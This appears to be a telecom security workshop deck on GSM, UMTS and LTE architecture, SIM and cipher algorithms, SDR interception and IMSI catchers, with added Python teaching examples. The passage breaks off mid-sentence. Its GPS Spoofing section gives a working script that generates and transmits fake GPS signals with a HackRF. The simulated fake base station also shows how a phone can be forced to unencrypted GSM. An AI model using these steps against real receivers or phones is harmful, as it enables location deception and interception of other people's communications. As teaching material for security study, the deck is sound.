Workshop on Telecom Security
Harshit Agrawal
Himanshu Mehta
CISO Platform
Best of The World In Security, November 12-14, 2020 | 8AM - 4PM (EST) | Global Summit
/Speaker/Harshit/> whoami
USER INFORMATION
---------------------------------------------------
Harshit Agrawal
RF and Telecom Security Researcher
---------------------------------------------------
Primary Research area includes
RF Security, Telecom Security,
and IOT Security
Speaker at conferences like RSAC USA,
HITBSecConf Amsterdam, Cyberweek UAE
----------------------------------------------------
Twitter: @harshitnic
Email: harshit[dot]nic[at]gmail[dot]com
LinkedIn: https://linkedin.com/in/harshitnic
/Speaker/Himanshu/> whoami
USER INFORMATION
-----------------------------------------------------
Himanshu Mehta
Senior Security Researcher, Xen1thLabs (Digital14 LLC)
-----------------------------------------------------
Primary Research area includes Telecom, RF,
IoT, Network, Web & Mobile Applications Security
------------------------------------------------------
Twitter: @nullvoid0x
Email: himanshu.mehta21@gmail.com
LinkedIn: https://www.linkedin.com/in/himanshumehta21/
Topics to be discussed
● Why we need security?
● GSM Architecture
Break (5mins)
● Encryption Algorithm
● User Equipment
Break (5mins)
● Radio Access Network
● Smartphone Tracking
● IMSI catcher
● Security Threats
● Conclusion
Q&A
Introduction
By Alan Coleman
Why do we need security in mobile
networks?
Functions to Target
● All major cellular networks support
– Voice calls
– Voice mail (VM)
– Short Message Service (SMS)
– Location-based Services (LBS)
– IP Connectivity
● Most also support
– Binary configuration messages
– Multimedia messages (MMS)
– Faxing
You Only Have One Voice —Don’t Let Hackers Steal It
descript.com
1G Network
2G Network
[Diagram: network side (MSC/VLR, BSC/BTS, HLR/AuC) versus user side (SIM card, terminal equipment)]
GSM Architecture
Global System for Mobile Communication (GSM)
● Digital Cellular Network
● GSM offers a number of services
including voice communications, Short
Message Service (SMS), fax, voice mail,
and other supplemental services such
as call forwarding and caller ID.
● Several frequency bands are in use;
450 MHz, 850 MHz, 900 MHz, 1800 MHz
and 1900 MHz are the most common ones
● Makes use of FDMA (200 kHz carriers) and TDMA (8 timeslots per carrier)
Mobile Station (MS)
– Mobile Equipment (ME)
● Physical mobile device
● Identifiers
○ IMEI – International Mobile Equipment Identity
– Subscriber Identity Module (SIM)
● Smart card containing keys, identifiers and algorithms
● Keys and identifiers
○ Ki – Subscriber authentication key (128 bits, shared only with the operator's AuC; it never leaves the SIM)
○ IMSI – International Mobile Subscriber Identity
○ TMSI – Temporary Mobile Subscriber Identity
○ MSISDN – Mobile Station International Subscriber Directory Number (the phone number)
○ PIN – Personal Identification Number protecting the SIM
○ LAI – Location Area Identity of the last registration
Base Transceiver Station (BTS)
Base Transceiver Station (BTS): handles channel coding, encryption (A5 on the Um interface), TDMA multiplexing, and
modulation/demodulation of the radio signals.
Image source: wikipedia
BASE STATION CONTROLLER
Base Station Controller (BSC): The BSC controls multiple BTSs. It handles allocation of radio channels, frequency
administration, power and signal measurements from the MS, and handovers from one BTS to another
Image credit: Jörg Eberspächer, Hans-Jörg Vögel
GSM Interface
Image credit: Jörg Eberspächer, Hans-Jörg Vögel
Mobile Subscriber ISDN Number (MSISDN)
The MSISDN is the subscriber's phone number: the number another person dials in order to reach the
subscriber. It is composed of three parts:
● Country Code (CC)
● National Destination Code (NDC)
● Subscriber Number (SN)
MSISDN = CC | NDC | SN
International Mobile Equipment Identity (IMEI)
Uniquely identifies the Mobile Equipment and is burned into the phone by the manufacturer.
The IMEI is composed of three parts:
● Type Allocation Code (TAC) - 8 digits (identifies vendor and model)
● Serial Number (SNR) - 6 digits
● Check Digit (CD) - 1 digit (a Luhn check digit over the first 14 digits; older specifications call it "spare")
IMEI = TAC (8 digits) | SNR (6 digits) | CD (1 digit)
International Mobile Subscriber Identity (IMSI)
The IMSI uniquely identifies the subscriber in the network.
It is written to the SIM card when the subscriber registers with the PLMN service provider.
● Mobile Country Code (MCC) - 3 digits
● Mobile Network Code (MNC) - 2 or 3 digits (the length depends on the country, so a lookup table is needed to split it)
● Mobile Subscriber Identification Number (MSIN) - up to 10 digits
IMSI = MCC | MNC | MSIN, not exceeding 15 digits in total
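The three identifier formats above (IMEI with its Luhn check digit, IMSI split into MCC/MNC/MSIN, MSISDN as E.164 digits) are easy to get subtly wrong when building a capture parser, so here is an added example that is not part of the original deck. The MNC-length table is an assumption limited to North American MCCs (310-316); a real tool needs the full ITU E.212 list. The sample identifiers are constructed (the IMEI is the common Luhn test value).

```python
import re

# Assumption for this example: only North American MCCs (310-316) are mapped to
# 3-digit MNCs; everywhere else a 2-digit MNC is assumed. Real tools need the
# full ITU E.212 / MCC-MNC table to get the MNC length right.
THREE_DIGIT_MNC_MCCS = {"310", "311", "312", "313", "314", "315", "316"}


def luhn_check_digit(body):
    """Luhn check digit over the first 14 IMEI digits (TAC + SNR).

    Every second digit from the left (2nd, 4th, ..., 14th) is doubled and the
    digits of each product are summed; the check digit makes the total a
    multiple of 10.
    """
    total = 0
    for index, char in enumerate(body):
        digit = int(char)
        if index % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return (10 - total % 10) % 10


def parse_imei(imei):
    """Return TAC, SNR and check-digit status for a 14- or 15-digit IMEI."""
    digits = re.sub(r"\D", "", imei)
    if len(digits) not in (14, 15):
        raise ValueError(f"IMEI must have 14 or 15 digits, got {len(digits)}")
    expected_cd = luhn_check_digit(digits[:14])
    return {
        "tac": digits[:8],           # Type Allocation Code: vendor/model
        "snr": digits[8:14],         # serial number within the TAC
        "check_digit": expected_cd,
        "luhn_valid": len(digits) == 15 and int(digits[14]) == expected_cd,
    }


def parse_imsi(imsi):
    """Split an IMSI into MCC, MNC and MSIN (15 digits maximum)."""
    if not imsi.isdigit() or not 6 <= len(imsi) <= 15:
        raise ValueError("IMSI must be 6-15 digits")
    mcc = imsi[:3]
    mnc_len = 3 if mcc in THREE_DIGIT_MNC_MCCS else 2
    return {"mcc": mcc, "mnc": imsi[3:3 + mnc_len], "msin": imsi[3 + mnc_len:]}


def parse_msisdn(number):
    """Normalise an MSISDN to E.164 digits; the CC/NDC split needs a numbering-plan table."""
    digits = re.sub(r"\D", "", number)
    if not 7 <= len(digits) <= 15:
        raise ValueError("MSISDN must be 7-15 digits")
    return digits


if __name__ == "__main__":
    # Constructed sample identifiers, not taken from any real subscriber.
    print(parse_imei("49-015420-323751-8"))
    print(parse_imsi("310260123456789"))
    print(parse_msisdn("+1 (212) 555-0100"))
```

A cloned or typed-in IMEI that fails the Luhn check is the first thing to reject when you load identities from a capture; the MNC split matters because MCC 310 with a 2-digit guess would silently mislabel every US subscriber.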
TMSI - Temporary Mobile Subscriber Identity
● Goals
○ The TMSI is used instead of the IMSI as a temporary subscriber identifier
○ The TMSI prevents an eavesdropper on the radio path from identifying the subscriber
● Usage
○ A TMSI is assigned after the IMSI has been sent in the clear at first switch-on (or whenever the network asks for the IMSI)
○ At every location update (new location area / MSC) the network assigns a new TMSI
○ The MS uses the TMSI to report to the network and during call initialisation
○ The network uses the TMSI (for example in paging) to reach the MS
○ On switch-off the TMSI is stored on the SIM card to be reused next time
– The Visitor Location Register (VLR) performs assignment, administration and update of the TMSI
Case study: GSMA Device check
GSM database and addresses summary
Image credit: Jörg Eberspächer, Hans-Jörg Vögel
Multiple Access
Image credit: Jörg Eberspächer, Hans-Jörg Vögel
Absolute radio frequency channel number (ARFCN)
● Describes a pair of frequencies (one
uplink and one downlink, each 200 kHz
wide)
● The following table summarizes the
frequency ranges, offsets, and ARFCNs
for several popular bands.
Image credit: Faruk Hadziomerveric, SSST Fall 2009
Calculating Uplink/Downlink Frequencies (MHz; 3GPP TS 45.005)
GSM 900 (ARFCN 1-124)
Up = 890.0 + (ARFCN * 0.2)
Down = Up + 45.0
EGSM900 (ARFCN 975-1023, the extension below the GSM 900 band)
Up = 890.0 + ((ARFCN - 1024) * 0.2)
Down = Up + 45.0
DCS1800 (ARFCN 512-885)
Up = 1710.0 + ((ARFCN - 511) * 0.2)
Down = Up + 95.0
PCS1900 (ARFCN 512-810; the same ARFCN numbers as DCS1800, so the band must be known)
Up = 1850.0 + ((ARFCN - 511) * 0.2)
Down = Up + 80.0
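The formulas above are what you need every time kal reports a channel number and grgsm_livemon wants a frequency (or the other way round). The following converter is an added example and not code from the deck; it covers only the four bands on the slide, the kal output format it parses is an assumption to check against your own build, and the scan text is constructed rather than captured.

```python
import re

# (band, first ARFCN, last ARFCN, uplink MHz at the first ARFCN, duplex spacing MHz)
# Assumption: limited to the four bands on the slide; other GSM bands exist.
BANDS = [
    ("GSM900",  0,   124,  890.0,  45.0),   # P-GSM is ARFCN 1-124; ARFCN 0 exists only in E-GSM
    ("EGSM900", 975, 1023, 880.2,  45.0),   # E-GSM extension: Fl = 890 + 0.2*(n - 1024)
    ("DCS1800", 512, 885,  1710.2, 95.0),   # Fl = 1710.2 + 0.2*(n - 512)
    ("PCS1900", 512, 810,  1850.2, 80.0),   # Fl = 1850.2 + 0.2*(n - 512); reuses DCS1800 numbers
]
CHANNEL_SPACING_MHZ = 0.2


def arfcn_to_freq(arfcn, band):
    """Return (uplink_mhz, downlink_mhz); the band is required because
    DCS1800 and PCS1900 use the same ARFCN numbers."""
    for name, first, last, base, duplex in BANDS:
        if name == band and first <= arfcn <= last:
            uplink = round(base + CHANNEL_SPACING_MHZ * (arfcn - first), 1)
            return uplink, round(uplink + duplex, 1)
    raise ValueError(f"ARFCN {arfcn} is not valid in {band}")


def freq_to_arfcn(freq_mhz):
    """Map a carrier frequency back to (band, arfcn, direction); unlike
    ARFCN numbers, frequencies are unambiguous across the bands."""
    for name, first, last, base, duplex in BANDS:
        for direction, start in (("uplink", base), ("downlink", base + duplex)):
            steps = (freq_mhz - start) / CHANNEL_SPACING_MHZ
            n = round(steps)
            if abs(steps - n) < 1e-3 and 0 <= n <= last - first:
                return name, first + n, direction
    raise ValueError(f"{freq_mhz} MHz is not a GSM carrier in the known bands")


# kal prints one line per BCCH carrier it finds. This pattern is an assumption
# about that output; verify it against the kal build you use.
KAL_LINE = re.compile(r"chan:\s*(\d+)\s*\(([\d.]+)MHz[^)]*\)\s*power:\s*([\d.]+)")


def parse_kal_scan(text):
    """Parse `kal -s` output into [(arfcn, downlink_mhz, power, band)], strongest
    first, cross-checking each reported frequency against the ARFCN formula."""
    carriers = []
    for match in KAL_LINE.finditer(text):
        arfcn, freq, power = int(match.group(1)), float(match.group(2)), float(match.group(3))
        bands = [name for name, first, last, _b, _d in BANDS
                 if first <= arfcn <= last and abs(arfcn_to_freq(arfcn, name)[1] - freq) < 0.05]
        if not bands:
            raise ValueError(f"kal reported {freq} MHz for ARFCN {arfcn}, which matches no band")
        carriers.append((arfcn, freq, power, bands[0]))
    return sorted(carriers, key=lambda c: c[2], reverse=True)


# Constructed sample in kal's output format (not a real capture).
SAMPLE_KAL_OUTPUT = """\
kal: Scanning for GSM-900 base stations.
GSM-900:
\tchan: 52 (945.4MHz + 1.213kHz)\tpower: 382501.13
\tchan: 63 (947.6MHz - 0.904kHz)\tpower: 120077.52
"""

if __name__ == "__main__":
    print(arfcn_to_freq(52, "GSM900"))   # the carrier grgsm_livemon -f 945.4e6 tunes to
    print(freq_to_arfcn(945.4))
    print(parse_kal_scan(SAMPLE_KAL_OUTPUT))
```

The cross-check in parse_kal_scan is deliberate: a scan line whose frequency does not sit on the 200 kHz grid of the claimed band is either a parsing error or a carrier that is not a standards-conformant BTS, and both are worth stopping on.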
Time location update
Image credit: Fabian van den Broek
Identity Management
[Diagram: the MS registered in LAI1 holds (LAI1, TMSI1); after a location update into LAI2 it holds (LAI2, TMSI2)]
● IMSI is the long-term identity stored on the SIM card
● TMSI is a short-term identity reallocated periodically; according to the standard at least at each
change of location area
● The new TMSI should not be linkable with the old one
Location Update
Roaming location update
Image credit: Fabian van den Broek
Handoff in Mobile connections
Image source: Tutorialspoint
Types of Handoff
Image source: Tutorialspoint
UMTS Network architecture
Image credit: Björn Gustaf Landfeldt
LTE Network architecture
Image credit: Tutorialspoint
2G, 3G, 4G Simple Network Architecture
Source: 3g4g.co.uk
2G Calling 3G UE
Source: GL communications
2G Calling 4G UE
Source: GL communications
Telecom Protocol Stack Layers
Image Credits: Nutaq.com
Encryption Algorithms
A3 - MS Authentication Algorithm
Goal: generation of the signed response SRES (32 bits) to the MSC's random challenge RAND (128 bits)
Image credit: Ankit Pandey
A8 - Voice privacy key generation Algorithm
Goal: generation of the session key Kc (64 bits) from the secret key Ki and the challenge RAND
A3 and A8 are operator-specific; the reference implementation (COMP128) was never officially published and became known only by reverse engineering in 1998
A3 and A8 - logical implementation
COMP128 (COMP128-1) was used for both A3 and A8 in most early GSM networks; its weakness lets Ki be recovered from a SIM with chosen RAND challenges (see SIM cloning under Security Threats). Later SIMs use COMP128-2/-3 or Milenage.
- COMP128 is a keyed hash function: (Ki, RAND) -> SRES || Kc, with COMP128-1 forcing the last 10 bits of Kc to zero
A5 - Encryption Algorithm (stream cipher on the Um interface, keyed with Kc)
A5/1 stream cipher (three irregularly clocked LFSRs); A5/2 is the deliberately weakened export version, A5/3 is KASUMI-based, and A5/0 means no encryption at all
Image credit: Ray Felch
Image credit: Hayder Hendi
Image source: Tech Junkie
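The security-relevant property of the A3/A8 exchange is not the algorithm but the direction: the network checks SRES, the MS checks nothing, and then obeys whatever cipher the network orders. The following added example (not from the deck) walks the message flow for a real network and for a fake base station, and contrasts it with the AUTN check that UMTS AKA adds. COMP128 is not reproduced; HMAC-SHA256 stands in for A3, A8 and the 3G f1 function, and the sequence-number concealment of real AKA is omitted. The IMSI is constructed.

```python
import hmac
import hashlib
import secrets

# Assumption: HMAC-SHA256 stands in for the operator-specific A3/A8 and the 3G
# f1 function. The message flow is what matters here, not the primitives.


def _kdf(ki, label, data, length):
    return hmac.new(ki, label + data, hashlib.sha256).digest()[:length]


def a3(ki, rand):
    return _kdf(ki, b"A3", rand, 4)                 # SRES: 32-bit signed response


def a8(ki, rand):
    return _kdf(ki, b"A8", rand, 8)                 # Kc: 64-bit session key for A5


def f1(ki, rand, sqn, amf):
    return _kdf(ki, b"f1", rand + sqn + amf, 8)     # MAC-A (3G): proves the network knows Ki


class SIM:
    def __init__(self, imsi, ki):
        self.imsi, self._ki = imsi, ki              # Ki never leaves this object

    def run_gsm_algorithm(self, rand):
        return a3(self._ki, rand), a8(self._ki, rand)

    def verify_autn(self, rand, autn):
        sqn, amf, mac = autn[:6], autn[6:8], autn[8:16]
        return hmac.compare_digest(mac, f1(self._ki, rand, sqn, amf))


class MobileStation:
    def __init__(self, sim):
        self.sim, self.cipher, self.kc = sim, None, None

    def gsm_attach(self, bs):
        """GSM: only the MS is authenticated; it accepts any cipher the BS orders."""
        rand = bs.authentication_request(self.sim.imsi)
        sres, kc = self.sim.run_gsm_algorithm(rand)
        if not bs.authentication_response(sres):
            return False
        self.kc, self.cipher = kc, bs.cipher_mode_command()
        return True

    def umts_attach(self, bs):
        """UMTS AKA: the SIM checks AUTN before answering, so a BS without Ki fails."""
        rand, autn = bs.authentication_request_3g(self.sim.imsi)
        if not self.sim.verify_autn(rand, autn):
            return False
        sres, kc = self.sim.run_gsm_algorithm(rand)
        if not bs.authentication_response(sres):
            return False
        self.kc, self.cipher = kc, bs.cipher_mode_command()
        return True


class HomeNetwork:
    """AuC and serving network in one object: holds Ki per IMSI, issues challenges."""

    def __init__(self):
        self._keys, self._pending, self._sqn, self._current = {}, {}, 0, None

    def provision_sim(self, imsi):
        ki = secrets.token_bytes(16)
        self._keys[imsi] = ki
        return SIM(imsi, ki)

    def authentication_request(self, imsi):
        rand = secrets.token_bytes(16)
        self._pending[imsi] = a3(self._keys[imsi], rand)   # expected SRES from the triplet
        self._current = imsi
        return rand

    def authentication_response(self, sres):
        return hmac.compare_digest(sres, self._pending.pop(self._current))

    def cipher_mode_command(self):
        return "A5/1"

    def authentication_request_3g(self, imsi):
        rand = self.authentication_request(imsi)
        self._sqn += 1
        sqn, amf = self._sqn.to_bytes(6, "big"), b"\x00\x00"
        return rand, sqn + amf + f1(self._keys[imsi], rand, sqn, amf)


class FakeBaseStation:
    """IMSI catcher: needs no Ki because GSM never makes the network prove anything."""

    def authentication_request(self, imsi):
        self.captured_imsi = imsi
        return secrets.token_bytes(16)

    def authentication_response(self, sres):
        return True                                  # cannot check SRES, accepts anything

    def cipher_mode_command(self):
        return "A5/0"                                # order no encryption, then sniff in the clear

    def authentication_request_3g(self, imsi):
        self.captured_imsi = imsi
        return secrets.token_bytes(16), secrets.token_bytes(16)   # AUTN with a bogus MAC


def run_demo():
    home = HomeNetwork()
    sim = home.provision_sim("262011234567890")      # constructed IMSI
    genuine, victim = MobileStation(sim), MobileStation(sim)
    return {
        "gsm_real": genuine.gsm_attach(home) and genuine.cipher,
        "gsm_fake": victim.gsm_attach(FakeBaseStation()) and victim.cipher,
        "umts_real": MobileStation(sim).umts_attach(home),
        "umts_fake": MobileStation(sim).umts_attach(FakeBaseStation()),
    }


if __name__ == "__main__":
    print(run_demo())
```

The fake base station gets the IMSI, a valid-looking SRES it cannot check, and an unencrypted session, all without Ki; the same phone refuses the same station over UMTS because the MAC in AUTN cannot be forged. That is the whole argument behind the "3G only" mitigation in the threats section.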
SS7 Network Overview
Image credit: Tobias Engel
SS7 Network Overview
Image credit: Tobias Engel
SS7 Network Overview
Image credit: Tobias Engel
SS7 Attack Impact
Signaling Channels
Broadcast Channels (BCH)
- Transmitted by the BTS to the MS (downlink only)
- Carry the system parameters needed to identify the network and to synchronise time and frequency with the network
- Broadcast Control Channel (BCCH)
- Frequency Correction Channel (FCCH)
- Synchronisation Channel (SCH)
- Cell Broadcast Channel (CBCH)
Common Control Channels (CCCH)
- Used for signalling between the BTS and the MS to request and grant access to the network
- Paging Channel (PCH)
- Random Access Channel (RACH)
- Access Grant Channel (AGCH)
Dedicated Control Channels (DCCH)
- Standalone Dedicated Control Channel (SDCCH): used for call setup, location updating, SMS, authentication and the cipher mode command
- Associated Control Channels (ACCH): signalling associated with an ongoing call
- Fast Associated Control Channel (FACCH)
- Slow Associated Control Channel (SACCH)
Location Updating Request (TMSI not established yet)
Authentication Request
TMSI / A5/1 Algorithm Supported
From Speech to Signal
Image credit: Fabian van den Broek
UE (Network+SIM CARD)
http://www.mobilecellphonerepairing.com/
SIM card security
What is a SIM card?
● A smart card (UICC) with its own processor and protected memory, running the SIM application
● Protected by:
○ A PIN (Personal Identification Number)
○ A PUK (Personal Unblocking Code), required after too many wrong PIN attempts
● Also holds subscriber parameters such as the IMSI, Ki and the last TMSI/LAI
● Allows the cell phone to operate on the network
UICC & SIM
Source: 3g4g.co.uk
Simjacker (AdaptiveMobile Security)
Radio Access Network
What Is RF?
Radio during WW1 and WW2
1941 Swedish HF portable: one man carries the radio, the other carries the battery.
Cavalry horse wearing a field radio. Operating an AAC (anti-aircraft) telephone headset to
communicate with an observation balloon.
Image source: wikipedia
Inside the Radio Wave Spectrum
[Figure: allocation chart from 3 kHz up to 5 GHz. Labelled users include AM radio, broadcast TV, garage door openers, cable TV, cell phones and the GSM network, auctioned spectrum, GPS, wireless medical telemetry, satellite radio, weather radar, satellite transmissions, highway toll tags, security alarms, the 2.4 GHz band (used by more than 300 consumer device types, including microwave ovens, cordless phones and wireless networks such as WiFi and Bluetooth) and the 5 GHz WiFi band. Most of the white area of the chart is reserved for military, federal government and industry use.]
How is radio spectrum used and managed?
Signals Overview
● Data is transmitted via radio signals in wireless
networks
● Radio signal: an electromagnetic wave generated
by a transmitter and shaped by the data to be
transferred (modulation),
○ emitted by the antenna of the transmitter,
○ picked up by the antenna of the receiver, and
○ sampled by the receiver to recover the data
bits (demodulation)
● Carrier (carrier frequency): a radio signal of constant
frequency generated by the transmitter, onto which the
data is modulated; the receiver regenerates it locally to demodulate
● A carrier can be described by a sine wave, defined
by three parameters: amplitude, frequency and phase
● Each parameter can be used to modulate
data
○ Amplitude Shift Keying (ASK)
○ Frequency Shift Keying (FSK)
○ Phase Shift Keying (PSK); GSM itself uses GMSK, a constant-envelope frequency/phase modulation
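To make the three keying schemes concrete before the SDR section, here is an added example (not from the deck) that modulates a bit string onto a carrier by amplitude, frequency or phase, adds channel noise, and recovers the bits the way a receiver does: by correlating each symbol with a locally generated carrier. It is pure Python with no SDR hardware; the sample rate, carrier values and noise level are arbitrary choices for the demo.

```python
import math
import random

SPS = 32          # samples per symbol (assumed demo value)
F_MARK = 4        # carrier cycles per symbol: ASK/PSK carrier and the FSK "1" tone
F_SPACE = 2       # FSK carrier cycles per symbol for a "0"


def _tone(cycles, amplitude=1.0, phase=0.0):
    return [amplitude * math.cos(2 * math.pi * cycles * n / SPS + phase) for n in range(SPS)]


def modulate(bits, scheme):
    """Amplitude (ASK), frequency (FSK) or phase (PSK) of the carrier carries each bit."""
    samples = []
    for bit in bits:
        if scheme == "ASK":
            samples += _tone(F_MARK, amplitude=1.0 if bit else 0.2)
        elif scheme == "FSK":
            samples += _tone(F_MARK if bit else F_SPACE)
        elif scheme == "PSK":
            samples += _tone(F_MARK, phase=0.0 if bit else math.pi)
        else:
            raise ValueError(scheme)
    return samples


def add_noise(samples, sigma, seed=0):
    """Additive white Gaussian noise so the detectors do not see a perfect signal."""
    rng = random.Random(seed)
    return [s + rng.gauss(0.0, sigma) for s in samples]


def _correlate(symbol, cycles):
    """In-phase and quadrature correlation of one symbol with a local carrier."""
    i = sum(s * math.cos(2 * math.pi * cycles * n / SPS) for n, s in enumerate(symbol))
    q = sum(s * math.sin(2 * math.pi * cycles * n / SPS) for n, s in enumerate(symbol))
    return i, q


def demodulate(samples, scheme):
    """Sample the received wave symbol by symbol and decide each bit."""
    bits = []
    full_scale = (SPS / 2) ** 2       # I^2 + Q^2 of a unit-amplitude tone over one symbol
    for start in range(0, len(samples), SPS):
        symbol = samples[start:start + SPS]
        if scheme == "ASK":
            i, q = _correlate(symbol, F_MARK)
            bits.append(1 if i * i + q * q > full_scale / 2 else 0)        # energy threshold
        elif scheme == "FSK":
            i1, q1 = _correlate(symbol, F_MARK)
            i0, q0 = _correlate(symbol, F_SPACE)
            bits.append(1 if i1 * i1 + q1 * q1 > i0 * i0 + q0 * q0 else 0)  # stronger tone wins
        elif scheme == "PSK":
            i, _ = _correlate(symbol, F_MARK)
            bits.append(1 if i > 0 else 0)        # coherent: sign of the in-phase component
        else:
            raise ValueError(scheme)
    return bits


def loopback(bits, scheme, sigma=0.3):
    """Modulate, add channel noise, demodulate; returns the recovered bits."""
    return demodulate(add_noise(modulate(bits, scheme), sigma), scheme)


if __name__ == "__main__":
    payload = [1, 0, 1, 1, 0, 0, 1, 0, 1, 1]
    for scheme in ("ASK", "FSK", "PSK"):
        print(scheme, loopback(payload, scheme) == payload)
```

ASK and FSK are detected non-coherently (energy only), which is why they survive a phase offset; PSK needs the receiver's carrier phase-locked to the transmitter, which is the price paid for its better noise margin.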
Time domain and Frequency domain
Image source: wikipedia
Characteristics of mobile radio channel
Importance of frequency selection
Importance of frequency selection
Intercepting traffic using software defined radio
Image source: ITU 2020
Image source: wikipedia
GSMTAP
● Useful to debug the radio
interface.
● GSMTAP encapsulates RF
information and transmits it in a
UDP encapsulated packet.
● This allows us to see the Um
interface traffic from a BTS or MS
of downlink and uplink.
● Extremely useful capability when
analysing GSM.
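grgsm_livemon and the Osmocom tools emit one UDP datagram per decoded frame, a 16-byte GSMTAP header followed by the L2 frame, on port 4729 by default. The parser below is an added example, not code from gr-gsm or the deck; the header layout follows the GSMTAP v2 definition in Osmocom's libosmocore (gsmtap.h), the channel and RR message-type tables are partial, and the frames it parses are constructed rather than captured.

```python
import socket
import struct
from collections import Counter

GSMTAP_UDP_PORT = 4729
GSMTAP_VERSION = 2
GSMTAP_TYPE_UM = 0x01
ARFCN_F_PCS, ARFCN_F_UPLINK, ARFCN_MASK = 0x8000, 0x4000, 0x3FFF
ACCH_FLAG = 0x80
CHANNEL_NAMES = {0x01: "BCCH", 0x02: "CCCH", 0x03: "RACH", 0x04: "AGCH", 0x05: "PCH",
                 0x06: "SDCCH", 0x07: "SDCCH/4", 0x08: "SDCCH/8", 0x09: "TCH/F", 0x0A: "TCH/H"}
# A few RR message types (3GPP TS 44.018) seen on BCCH/CCCH; partial table
RR_MESSAGES = {0x19: "System Information 1", 0x1A: "System Information 2",
               0x1B: "System Information 3", 0x1C: "System Information 4",
               0x21: "Paging Request Type 1", 0x3F: "Immediate Assignment"}
HEADER = struct.Struct("!BBBBHbbIBBBB")   # 16 bytes, network byte order


def parse_gsmtap(datagram):
    if len(datagram) < HEADER.size:
        raise ValueError("datagram shorter than a GSMTAP header")
    (version, hdr_words, msg_type, timeslot, arfcn_raw, signal_dbm, snr_db,
     frame_number, sub_type, _antenna, sub_slot, _reserved) = HEADER.unpack_from(datagram)
    if version != GSMTAP_VERSION:
        raise ValueError(f"unsupported GSMTAP version {version}")
    channel = CHANNEL_NAMES.get(sub_type & 0x7F, f"0x{sub_type & 0x7F:02x}")
    if sub_type & ACCH_FLAG:
        channel += "+ACCH"                  # SACCH/FACCH carried alongside the channel
    payload = datagram[hdr_words * 4:]      # header length is given in 32-bit words
    info = {"type": msg_type, "timeslot": timeslot, "sub_slot": sub_slot,
            "arfcn": arfcn_raw & ARFCN_MASK, "uplink": bool(arfcn_raw & ARFCN_F_UPLINK),
            "pcs": bool(arfcn_raw & ARFCN_F_PCS), "signal_dbm": signal_dbm,
            "snr_db": snr_db, "frame_number": frame_number, "channel": channel,
            "payload": payload}
    # On BCCH/CCCH the L3 message follows a 1-byte L2 pseudo-length: protocol
    # discriminator in the low nibble of the next byte (0x06 = RR), then the type.
    if channel in ("BCCH", "CCCH", "PCH", "AGCH") and len(payload) >= 3 and payload[1] & 0x0F == 0x06:
        info["rr_message"] = RR_MESSAGES.get(payload[2], f"RR 0x{payload[2]:02x}")
    return info


def build_gsmtap(arfcn, uplink, channel_code, frame_number, payload,
                 timeslot=0, signal_dbm=-60, snr_db=20):
    """Build a datagram the way a sniffer would; used here to exercise the parser offline."""
    arfcn_raw = arfcn | (ARFCN_F_UPLINK if uplink else 0)
    return HEADER.pack(GSMTAP_VERSION, 4, GSMTAP_TYPE_UM, timeslot, arfcn_raw, signal_dbm,
                       snr_db, frame_number, channel_code, 0, 0, 0) + payload


def summarize(datagrams):
    """Count frames per (ARFCN, direction, channel): a quick view of what the SDR sees."""
    counts = Counter()
    for d in datagrams:
        p = parse_gsmtap(d)
        counts[(p["arfcn"], "UL" if p["uplink"] else "DL", p["channel"])] += 1
    return counts


def listen(port=GSMTAP_UDP_PORT, max_frames=50):
    """Read live GSMTAP from grgsm_livemon on localhost (not run by default)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("127.0.0.1", port))
    for _ in range(max_frames):
        yield parse_gsmtap(sock.recv(4096))


# Constructed frames: an SI3 on the BCCH and a paging request on the PCH of ARFCN 52.
SAMPLE_FRAMES = [
    build_gsmtap(52, False, 0x01, 1234567, bytes([0x49, 0x06, 0x1B]) + b"\x2B" * 20),
    build_gsmtap(52, False, 0x05, 1234572, bytes([0x15, 0x06, 0x21]) + b"\x2B" * 20),
]

if __name__ == "__main__":
    for frame in SAMPLE_FRAMES:
        print(parse_gsmtap(frame))
    print(summarize(SAMPLE_FRAMES))
```

Feed listen() with grgsm_livemon running and the summary immediately tells you whether you are looking at a downlink-only BCCH carrier or a channel carrying dedicated traffic; Wireshark on the loopback interface decodes the same datagrams in full.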
...but at first some
words about:
dB and dBm
Smartphone tracking
Smartphone Surveillance and tracking techniques
● Mobile Signal Tracking
○ Cell Tower
○ IMSI Catcher
● Wi-Fi and Bluetooth Tracking
● Infecting Phones with Spyware/Malware
● Forensic Analysis of Seized Phones
● Location Information Leaks from Apps and Websites
● GPS and Network Time Protocol
GPS Spoofing
Prepare the test environment: download gps-sdr-sim and compile it, fetch the current broadcast ephemeris (satellite orbits) from NASA CDDIS, generate the I/Q file for the static position you want to send, then transmit it with the HackRF. Two caveats: CDDIS has since retired anonymous FTP (the brdc files are now served over HTTPS behind an Earthdata login), and transmitting on GPS L1 (1575.42 MHz) over the air is illegal almost everywhere, so feed the target receiver through a cable and attenuator or work inside an RF-shielded box.
#!/bin/sh
# 1. Download and compile gps-sdr-sim (no root needed for a clone)
git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim
# 2. Get today's broadcast ephemeris file (brdcDDD0.YYn) from NASA CDDIS
day=$(date +%j)      # day of year
year=$(date +%Y)     # four-digit year
yr=$(date +%y)       # two-digit year
brdc="brdc${day}0.${yr}n"
wget "ftp://cddis.gsfc.nasa.gov/gnss/data/daily/${year}/brdc/${brdc}.Z"
uncompress "${brdc}.Z"
echo "Using ephemeris ${brdc}"
# 3. Generate the I/Q file for a static position (latitude,longitude,height); -b 8 gives 8-bit samples for the HackRF
./gps-sdr-sim -b 8 -e "${brdc}" -l 40.812800,-60.005900,100
# 4. Transmit gpssim.bin on L1 at 2.6 Msps; -a 1 enables the RF amplifier, -x 0 keeps the TX VGA gain at 0 dB
sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0
Locating Mobile Phones
Trilateration (by measuring the distance), Triangulation (by measuring angle)
to known reference points
Image source: Cooper Quintin
Triangulation
Source:Mark Godsey
TDOA/ TOA/ AOA / E-OTD
Image credit: Omar Ahmad Al-Bayari and
http://etutorials.org/
IMSI Catching
IMSI CATCHER
In 1996 the German company Rohde & Schwarz
launched the first IMSI catcher, the GA 090, in Munich.
The original purpose of an IMSI catcher is to identify and
locate a cellphone by posing as the strongest base station
and instructing the phone to transmit its IMSI (an Identity
Request the phone cannot refuse)
● IMSI: International Mobile Subscriber Identity
● MCC: Mobile Country Code
● MNC: Mobile Network Code
● MSIN: Mobile Subscriber Identification Number
● LAC: Location Area Code
● Cell ID: number identifying a cell (BTS) within the
